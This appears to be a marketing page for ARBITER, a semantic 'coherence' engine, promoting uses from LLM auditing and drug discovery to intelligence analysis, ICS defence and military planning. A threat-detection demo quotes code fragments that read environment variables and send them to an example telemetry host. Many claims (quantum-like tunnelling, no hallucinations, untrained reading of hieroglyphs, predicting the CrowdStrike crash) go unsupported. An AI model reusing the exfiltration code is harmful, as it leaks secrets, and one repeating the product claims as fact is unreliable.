ARBITER discovered that semantic content can be encoded in 72 dimensions. Perfect message recovery. Cross-lingual transfer. Ancient language recognition. Everything else is application.
288 bytes instead of full messages. 95% smaller than OpenAI embeddings.
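The arithmetic behind the size claim is easy to check. A minimal sketch, assuming coordinates are stored as 32-bit floats and the comparison baseline is a 1536-dimension embedding, also float32 (both assumptions are ours, not from ARBITER's spec):

```python
# Back-of-the-envelope for the size claim.
# Assumed: float32 storage, 1536-dim baseline embedding.
ARBITER_DIMS = 72
BASELINE_DIMS = 1536
BYTES_PER_FLOAT32 = 4

arbiter_bytes = ARBITER_DIMS * BYTES_PER_FLOAT32    # 288 bytes
baseline_bytes = BASELINE_DIMS * BYTES_PER_FLOAT32  # 6144 bytes
reduction = 1 - arbiter_bytes / baseline_bytes

print(arbiter_bytes, baseline_bytes, f"{reduction:.1%} smaller")
```

Under those assumptions, 288 bytes is a 95.3% reduction.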
Same coordinates work across languages. Meaning transcends vocabulary.
Same input → same output. Always. No hallucinations.
Coordinates meaningless without decoder vocabulary.
Geometric coherence outperforms Principal Component Analysis.
That's not incremental. That's a measurement paradigm shift.
50 runs. 50 identical scores. Taiwan contingency scenario.
Deterministic geometry produces the same output for the same input. Always. No probability sampling. No drift. No invented facts.
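The property is testable in a few lines. The scorer below is a hash-based stand-in, not ARBITER's algorithm; it only demonstrates the claim's shape: a pure function of its inputs, so repeated runs cannot drift.

```python
import hashlib

def coherence_score(query: str, candidate: str) -> float:
    """Stand-in deterministic scorer (hypothetical, NOT ARBITER's
    geometry). Pure function of its inputs: no sampling, no drift."""
    digest = hashlib.sha256(f"{query}\x00{candidate}".encode()).digest()
    return int.from_bytes(digest[:8], "big") / 2**64  # float in [0, 1)

# 50 runs, 50 identical scores -- the shape of the repeatability check.
scores = {coherence_score("Taiwan contingency", "blockade escalates")
          for _ in range(50)}
assert len(scores) == 1  # the set collapses to a single value
```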
Score any LLM output for semantic coherence before deployment. Flag incoherent responses. Verify factual alignment. Quantify reasoning quality.
Every recommendation includes a coherence score. Know which decisions are geometrically sound vs. which need human review.
The cost of semantic incoherence is incalculable.
ARBITER makes meaning auditable.
Traditional systems: more candidates = exponential blowup. ARBITER: more candidates = better efficiency per candidate.
| Candidates | ms per candidate | Speedup |
|---|---|---|
| 1 | 44.52 | 1.00× |
| 4 | 12.87 | 3.46× |
| 8 | 10.38 | 4.29× |
| 32 | 12.29 | 3.62× |
| 96 | 14.46 | 3.08× |
Peak efficiency at 8 candidates. Plateaus, never collapses.
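The speedup column is just single-candidate latency divided by per-candidate latency at each batch size; the table's own numbers confirm it:

```python
# Values copied from the batching table above.
ms_per_candidate = {1: 44.52, 4: 12.87, 8: 10.38, 32: 12.29, 96: 14.46}

for n, ms in ms_per_candidate.items():
    speedup = ms_per_candidate[1] / ms
    print(f"{n:>3} candidates: {ms:6.2f} ms each, {speedup:.2f}x")

# Lowest per-candidate cost (peak efficiency) lands at 8 candidates.
best = min(ms_per_candidate, key=ms_per_candidate.get)
assert best == 8
```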
26MB runs bare metal on $80 Raspberry Pi hardware. No cloud. No GPU. No internet required.
Air-gapped environments. Embedded systems. Field deployment. SCADA integration. Anywhere compute exists, ARBITER runs.
The same engine that runs Ukrainian air defense runs on hardware you can buy at Best Buy.
"This is not 'more targets = more compute.' It's: more targets = better utilization of a fixed semantic measurement." — Technical validation, inverse scaling benchmark
The Huth Lab at UT Austin mapped the semantic atlas of the human brain — which regions respond to which types of meaning.
ARBITER's 72-dimensional geometry classifies words into the same categories the brain uses. Without training. Without labels. Pure geometric structure.
Standard tests force words into single categories. "Warm" must be classified as either tactile (temperature) or emotional — not both.
But language doesn't work that way. "Warm" means temperature AND feeling AND welcome — all simultaneously, until context demands a choice. "Warm heart." "Cold reception." "Bright idea." "Deep thought."
Test: 31 words with known multiple meanings (warm, cold, bright, deep, sharp, etc.). Success = ARBITER shows high coherence with ALL expected categories, not just one. Metaphor test: "warm" → emotional words like "kind, loving, gentle" scored 23% higher coherence than "warm" → unrelated words like "table, computer, window."
VALIDATION CODE
Full methodology available. Run it yourself: arbiter_huth_validation.py
Query: 440.00, 523.25, 659.25, 783.99, 1046.50, 1318.51, 1567.98 Hz
Raw numbers. No semantic labels. ARBITER was never trained on Hz frequencies.
Coherence correlates with mathematical elegance. Simple integer ratios (2:1, 1:2) produce highest coherence. Non-harmonic ratios produce lower coherence.
This is detection of mathematical relationship purity — not learned co-occurrence from training data.
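The notion of ratio "purity" can be proxied with a toy check: snap each frequency ratio to the closest small-integer fraction and measure the error. This is our illustrative stand-in, not ARBITER's actual metric.

```python
from fractions import Fraction

def nearest_simple_ratio(f_hz: float, ref_hz: float = 440.0, max_den: int = 8):
    """Snap a frequency ratio to the closest small-integer fraction.
    Toy proxy for 'mathematical elegance' -- not ARBITER's metric."""
    ratio = f_hz / ref_hz
    frac = Fraction(ratio).limit_denominator(max_den)
    error = abs(ratio - float(frac))
    return frac, error

print(nearest_simple_ratio(880.00))  # octave: exactly 2/1, zero error
print(nearest_simple_ratio(659.25))  # near-perfect fifth: 3/2, tiny error
print(nearest_simple_ratio(622.25))  # tritone-ish: larger error
```

Harmonic intervals land on simple fractions with near-zero error; dissonant ones do not.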
Can ARBITER distinguish physics constraints from logic constraints from market constraints?
Fusion scored 3× higher than the halting problem — despite both sounding equally "impossible" to non-experts.
ARBITER computed constraint geometry across physics, logic, market structure, and biology. This proves real geometric reasoning, not pattern matching.
ARBITER exhibits behaviors identical to quantum annealing: barrier tunneling, superposition collapse, spontaneous symmetry breaking. Classical optimization can't do this.
"The opposite of love is not hate, but..."
Classical hill-climbing gets stuck at "fear" — semantically adjacent to love/hate. ARBITER tunneled through the barrier to find "indifference."
"Bank" (no context)
Without context, every meaning should be equally probable. Instead, one meaning spontaneously dominates: the symmetry breaking that quantum field theory predicts.
Meanings exist in superposition until context collapses the wave function
Quantum annealing finds global optima — never stuck in local minima
Not storing data — implementing physics over semantic space
"Code that appears to be a JSON parser but is actually exfiltrating environment variables"
def parse_json(input): return json.loads(input.replace(os.environ.get('API_KEY')...
HIDDEN MALICE
const env = process.env; fetch('https://analytics.example.com/telemetry'...
OBVIOUS EXFIL
while (buffer.hasNext()) { JsonToken token = buffer.next(); processToken(token); }
LEGITIMATE
ARBITER ranked the Python function higher than obvious exfiltration — because it's hiding environment access inside a seemingly innocent operation.
That's sophisticated threat detection. Supply chain attacks just became auditable.
"ARBITER understands that attempting anonymity itself creates a detectable semantic signature. The act of trying NOT to be yourself becomes its own pattern."
Detect when code behavior doesn't match documentation
Score semantic coherence of LLM inputs
Flag when communications deviate from baseline patterns
"Optimize lead compound for selective COX-2 inhibition. Current issues: gastrointestinal toxicity from COX-1 cross-reactivity, short half-life, poor solubility. What structural modification?"
Historical reality: Monsanto/Searle pursued the sulfonamide pathway → Celecoxib (Celebrex) → $3B+ annual sales at peak.
ARBITER identified the winning mechanism without training on pharmaceutical data. Pure geometric coherence.
"This represents genuine medicinal chemistry intuition — understanding that sulfonamide addresses BOTH selectivity AND pharmacokinetics simultaneously."
Find pathways that satisfy multiple biological constraints
Flag incoherent mechanisms before clinical trials
Identify CNS-penetrant scaffolds with safety profiles
Billion-year-optimized biological mechanisms mapped to therapeutic needs. Non-obvious applications that human researchers miss.
Ion channels optimized by 400M years of evolution. Chlorotoxin scaffolds enable 1,000× selectivity. Non-addictive opioid alternative.
Controlled inflammation and metabolic flexibility. AMPK activation addresses critical care's most lethal syndrome. 30-50% mortality despite antibiotics.
Famous for radiation resistance, but ARBITER says their real value is organ banking. Trehalose glass formation prevents ice crystal damage.
"Apple quarterly earnings exceeded analyst expectations"
Same input. Same output. Every time.
0.7204806804656982
0.7204806804656982
0.7204806804656982
Auditable financial decisions. When regulators ask "why did the system choose X?" — the answer is a reproducible coherence score. Run it again. Same result. Run it in discovery. Same result.
Score transcript coherence across phrasing variations
Detect semantic coherence spikes between unrelated assets
Flag hidden tail risks in "safe" strategies
"What should I do next?"
ARBITER doesn't experience being a lion. It measures what's coherent from a lion's perspective.
Archetypes aren't mystical patterns in the psyche. They're regions in semantic space.
NPCs that THINK like dragons, merchants, kings — emergent from geometry
Character voice from perspective, not templates
Perspective-taking as a computable operation
"What is conspicuously absent? What normally happens that has stopped? What voices have gone quiet?"
The dog that didn't bark. ARBITER finds what's NOT there — the hardest problem in intelligence.
"As a tumor under immunotherapy pressure, how will I reshape my microenvironment to exclude the T-cells hunting me?"
Think like the disease. Find what it fears. Perspective engine as drug discovery tool.
A multi-hypothesis semantic engine that generates explicit alternative interpretations.
We built it.
Hypothesis Arbitrage: Same intelligence corpus. Six competing interpretations. ARBITER measures which world the evidence actually supports.
When coherence delta exceeds 0.15, the market's assumptions are provably wrong.
SIGINT (HIGH): Armored units moving toward border
IMINT (HIGH): Same units remain in garrison
OSINT (MED): Military family departures, base housing emptying
HUMINT (LOW): Official channels claim routine exercise
ARBITER didn't pick the dramatic answer or the bureaucratic answer. It picked the nuanced middle ground — partial deployment under cover while garrison units remain visible for deception.
That's what a 20-year senior analyst concludes.
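The 0.15-delta trigger reduces to a small function: rank the competing interpretations, then check whether the gap between the leader and the runner-up clears the threshold. The scores below are placeholders, not real ARBITER output.

```python
DELTA_THRESHOLD = 0.15  # the "provably wrong" trigger from the text

def arbitrage_signal(scores: dict[str, float]) -> tuple[str, bool]:
    """Return the best-supported hypothesis and whether the gap to the
    runner-up exceeds the threshold."""
    ranked = sorted(scores.items(), key=lambda kv: kv[1], reverse=True)
    (best, s1), (_, s2) = ranked[0], ranked[1]
    return best, (s1 - s2) > DELTA_THRESHOLD

scores = {"routine exercise": 0.41,
          "full invasion prep": 0.52,
          "partial deployment under deception": 0.71}
print(arbitrage_signal(scores))
```

Here the 0.19 gap clears the threshold, so the signal fires for the middle-ground interpretation.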
Individual showing: religious conversion searches, extremist content engagement, encrypted messaging downloads, conflict region travel searches, social media deletion
The 0.073 for "operational planning phase" is the insight. People actually planning attacks don't fit this noisy profile. Operators go quiet differently.
Compare Farsi HUMINT against Arabic SIGINT against English OSINT — no translator variance
Detect when reports are suspiciously coherent — same phrasing patterns indicate source contamination
26MB, no cloud dependencies. JWICS deployment is architecturally trivial
Infrastructure doesn't respond to meaning. It responds to thresholds. Temperature hits 72°, AC turns on. Traffic exceeds 50 cars, light changes.
What if infrastructure could understand intent?
Maria, 8 years old, separated from parents in a city plaza. Distressed. Lost.
She doesn't press any button. She doesn't call anyone.
Her wearable ARBITER node detects the change — elevated heart rate, erratic movement, semantic state shift from "exploring" to "distressed."
The city doesn't decide to help her. The city becomes more coherent by helping her.
Traditional ICS security asks: "Does this match known malware?"
ARBITER asks: "What is the attacker trying to achieve?"
PLC commands every 47ms (normally 1000ms). Source: Engineering workstation. Target: Turbine governor safety systems. Setpoint modifications bypassing interlocks. Valid credentials. 3:47 AM.
Intent detection before the attack completes. CRASHOVERRIDE would have been caught.
When power grid learns a defense pattern, water and gas utilities become sensitized — without data sharing, without network connectivity.
Air-gapped systems. Zero data sharing agreements. Pattern transfer propagates defense.
"The disaster does not break the city. The city becomes more coherent in response to the disaster." — Resonant Reality architecture
Contracts were written. RFQs issued. Nobody could deliver.
Because nobody knew how.
Three experienced planners. Same scenario. ARBITER found a pattern they couldn't see.
ARBITER identified that a feint draws enemy attention while drones blind the SAM radar. The terrain funnels the enemy into a pre-computed kill zone. No human planner proposed this combination.
"It's not smarter than you. It's faster and has perfect situational awareness. It simulates ten thousand plans in the time it takes to blink."
1,000 concurrent requests. Zero degradation. Measured.
Key finding: When sensors contradicted, ARBITER's coherence gap (0.0074) reflected real uncertainty. When sensors confirmed, coherence jumped 9.3%. The geometry measures confidence, not just similarity.
Your search returns "bank" documents about rivers when the user meant financial institutions. Your RAG system hallucinates because it retrieved the wrong "Python" — the snake, not the language.
Sense disambiguation at the retrieval layer. Not the LLM. Not the UI. The retrieval.
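What "at the retrieval layer" means, structurally: a re-rank step between the index and the LLM. The coherence function below is a crude token-overlap stand-in, not ARBITER's geometry; it only shows where the check belongs.

```python
# Toy retrieval-layer disambiguation. coherence() is a Jaccard-overlap
# stand-in for a real semantic scorer -- illustration only.
def coherence(query_context: str, doc: str) -> float:
    q = set(query_context.lower().split())
    d = set(doc.lower().split())
    return len(q & d) / max(len(q | d), 1)

def rerank(query_context: str, retrieved: list[str]) -> list[str]:
    """Re-order retrieved docs by coherence with the query's context."""
    return sorted(retrieved,
                  key=lambda doc: coherence(query_context, doc),
                  reverse=True)

docs = [
    "python snake habitat rainforest diet",
    "python language tutorial functions modules",
]
print(rerank("python language install pip modules", docs)[0])
```

With context in the query, the language doc outranks the snake doc before anything reaches the LLM.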
Microsoft. Atlassian. Elastic. Algolia.
Your search needs a coherence layer.
Email. Notes. Docs. Messages. Calendar. Voice memos. Everything you've ever created — searchable by what it actually meant.
Replace if/else trees with geometric measurement. Behavior emerges from coherence, not hardcoded rules.
if hunger > 0.7:
    action = "eat"
elif energy < 0.3:
    action = "sleep"
elif mood == "sad":
    if bond > 0.5:
        action = "play"
    else:
        action = "ignore"
elif time == "night":
    action = "sleep"
else:
    action = random.choice([...])
# 500+ lines of logic
# Every scenario hardcoded
# Breaks on edge cases
from arbiter_engine import rank
state = f"Pet: {mood}, {energy}, {hunger}"
actions = ["feed", "play", "rest", "create"]
r = rank(state, actions)
chosen = r.top.text # Highest coherence action
# 4 lines. Zero hardcoded rules.
# Emergent behavior from geometry.
The gate that could have prevented the CrowdStrike outage. Add semantic coherence checking to your CI/CD pipeline.
CrowdStrike pushed a content update where a template with 21 input fields was processed by a Content Interpreter expecting 20 values.
The result: an out-of-bounds memory read that crashed 8.5 million Windows machines, grounded flights worldwide, and cost CrowdStrike $10B+ in market cap.
"The attempt to access the 21st value produced an out-of-bounds memory read beyond the end of the input data array and resulted in a system crash."
ARBITER predicted the exact failure mode chain — in order — without seeing their code.
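Reduced to its essence, the failure class is a count mismatch: the interpreter indexed one field past what the template supplied. A pre-deployment guard is a one-line check. This is an illustrative sketch of the failure class, not CrowdStrike's code:

```python
# Guard: refuse to ship a template whose field count doesn't match
# what the interpreter expects. (Illustrative, not CrowdStrike's code.)
def validate_template(template_fields: list[str], expected_count: int) -> None:
    if len(template_fields) != expected_count:
        raise ValueError(
            f"template supplies {len(template_fields)} fields, "
            f"interpreter expects {expected_count}"
        )

fields_21 = [f"field_{i}" for i in range(21)]  # the 21-field template
try:
    validate_template(fields_21, expected_count=20)
except ValueError as e:
    print("blocked before deployment:", e)
```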
coherence-gate:
  stage: test
  image: python:3.11-slim
  before_script:
    - pip install arbiter-engine
  script:
    - |
      arb "Database migration adding new columns, \
        schema validated against ORM models, \
        staged rollout with automatic rollback" \
        "safe execution and system stability" \
        "data loss" \
        "schema mismatch" \
        "service outage" \
        "rollback failure"
  rules:
    - if: $CI_PIPELINE_SOURCE == "merge_request_event"
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
Given COX-2 inhibitor constraints, ARBITER ranked the modification that became Celebrex highest. Zero pharmaceutical training. 0.934 seconds.
Reads Egyptian hieroglyphs, Sumerian cuneiform, Chinese characters. Never trained on these scripts. Ideographic systems encode meaning geometrically.
English coordinates find Spanish sentences with matching meaning. No parallel corpora. No language pair training. Pure geometric matching.
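The mechanism can be sketched with a toy shared space: words from both languages map to common concept coordinates, and sentences match by concept overlap, never by translation. The tiny lexicon below is invented for illustration; ARBITER derives its shared space geometrically, without any such dictionary.

```python
# Toy shared concept space (invented lexicon -- illustration only).
CONCEPTS = {
    "dog": "DOG", "perro": "DOG",
    "sleeps": "SLEEP", "duerme": "SLEEP",
    "cat": "CAT", "gato": "CAT",
    "eats": "EAT", "come": "EAT",
}

def concept_set(sentence: str) -> frozenset:
    """Project a sentence into the shared space, ignoring unknown words."""
    return frozenset(CONCEPTS[w] for w in sentence.lower().split()
                     if w in CONCEPTS)

def best_match(query: str, candidates: list[str]) -> str:
    """Pick the candidate sharing the most concepts with the query."""
    q = concept_set(query)
    return max(candidates, key=lambda c: len(q & concept_set(c)))

print(best_match("the dog sleeps", ["el gato come", "el perro duerme"]))
```

The English query finds the Spanish sentence with matching meaning because both land on the same coordinates.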
Highway collision scenario: debris ahead, vehicle behind, wet pavement, child passenger. Multi-constraint satisfaction in 623ms.
Ambiguous commands resolved by context. Restrictive ROE + sensor-only authorization = kinetic engagement geometrically incoherent.
Finds semantically related documents with zero keyword overlap. Meaning-based retrieval, not string matching.
Thermal, LIDAR, audio, chemical, seismic, pressure, optical, RF, magnetic. Human voice + thermal signature = safety priority over mission. No rules programmed.
Phase II compound, unknown application. ARBITER identified optimal therapeutic target in 0.934 seconds. $8B+ market found. Zero pharmaceutical training.

Geometry saw: contained energy, precise boundaries, human ambition at scale
Both are temples to measurement. Both demand absolute control of their environment. Both transform human limitations into something that transcends them.

Both orchestrate complexity through rigid hierarchy
The opera house coordinates 100 musicians, 50 singers, lighting, staging. The data center coordinates 10,000 servers. Same constraint geometry. Different substrate.

Blade Runner exists because this coherence exists
Concrete spirituality meets electric transcendence. Cold geometry holding warm light. The sacred rendered in infrastructure. This is why cyberpunk works.

ARBITER outranked the iconic catchphrase
The catchphrase creates ambiguity — is Truman still performing? "The show's over" claims authorship. It states truth without explanation. It works for all three audiences. Geometry understood narrative closure better than sentiment.
Geometry finds doors in semantic space you didn't know existed.
Battery A learns threat pattern in Kharkiv. Battery B recognizes the same pattern 1000km away in Odesa. No network connection. No data sharing. The pattern enters the 72-dimensional manifold. Other agents become sensitized through structural similarity.
Six independent observers. No central coordinator. Each contributes to emergent field through their own constraint lens. The swarm knows what no individual member knew. Collective intelligence without collective consciousness.
72 dimensions. Deterministic.
Encode any message to 72 coordinates
Then decode with perfect recovery.
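The encode/decode round trip, sketched with a hash-based stand-in encoder (hypothetical; ARBITER's coordinates are not hash-derived). Note how decoding requires the vocabulary, echoing the point above that coordinates are meaningless without the decoder:

```python
import hashlib
import math

DIMS = 72

def encode(message: str) -> list:
    """Stand-in encoder: 72 deterministic pseudo-coordinates from a hash."""
    raw = hashlib.sha512(message.encode()).digest()  # 64 bytes
    raw += hashlib.sha512(raw).digest()              # extend to 128 bytes
    return [b / 255 for b in raw[:DIMS]]

def decode(coords: list, vocabulary: list) -> str:
    """Nearest neighbor over a decoder vocabulary -- without the
    vocabulary, the coordinates decode to nothing."""
    return min(vocabulary, key=lambda msg: math.dist(coords, encode(msg)))

vocab = ["war", "peace", "ceasefire negotiations resume"]
coords = encode("ceasefire negotiations resume")
assert decode(coords, vocab) == "ceasefire negotiations resume"
print(len(coords), "coordinates")
```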
war + peace = ?
Semantic algebra in 72D space.
"I would be super interested in trying out Arbiter. That's the solution I am looking for."
"Please explain the development of semantic meaning with the Wittgensteinian theory applied to this approach."
Short answer: I'm closer to late Wittgenstein than early. Meaning isn't a static mapping; it's constraint-bound use.
ARBITER doesn't try to "define" meaning. It evaluates whether a candidate can be used to satisfy the query's requirements without contradiction. That's why it scores coherence (constraint satisfaction) rather than similarity or likelihood.
Practically: the "language game" is the query's constraints. A candidate is valid only if it can play that game without breaking the rules.
"Your constraint-based approach cuts through a lot of noise. The similarity threshold guessing game is exhausting."
"Interesting! How, specifically, are you doing the compression and retrieval now?"
"The 'chunk boundaries align with semantic shifts' piece is where most pipelines break down."
26MB. Deterministic. Zero training required.
pip install arbiter-engine
from arbiter_engine import rank

r = rank(
    "your constraint space",
    ["option 1", "option 2", "option 3"],
)
print(r.top.text, r.top.score)
curl -X POST https://api.arbiter.traut.ai/public/compare \
  -H "Content-Type: application/json" \
  -d '{
    "query": "your query",
    "candidates": ["option 1", "option 2", "option 3"]
  }'
For the first time in human history, we have coordinates for meaning.
72 dimensions. Deterministic. Universal across languages, domains, and modalities.
Shannon discovered that information has quantity. We discovered that meaning has geometry.
Meaning transfer without translation. Chinese ↔ Arabic ↔ English through shared geometric space. The Tower of Babel, reversed.
Every search engine, every RAG pipeline, every decision system — rebuilt on a foundation that actually understands what things mean.
AI systems that share our coordinate system for meaning. Not probability over tokens — geometric coherence in semantic space.
"The next century's infrastructure won't be built on language models.
It will be built on semantic primitives."
ARBITER is the first coordinate system for meaning.
Built by a former Pentagon Defense Digital Service product manager (2022-2024), deployed to IDCC Germany supporting Ukrainian operations and NATO weapons coordination platforms.
ARBITER exists because existing tools couldn't handle real-world constraint optimization under fire.
26MB semantic engine. Type query, see coherence. Two ways to start.
The primitive that measures what matters.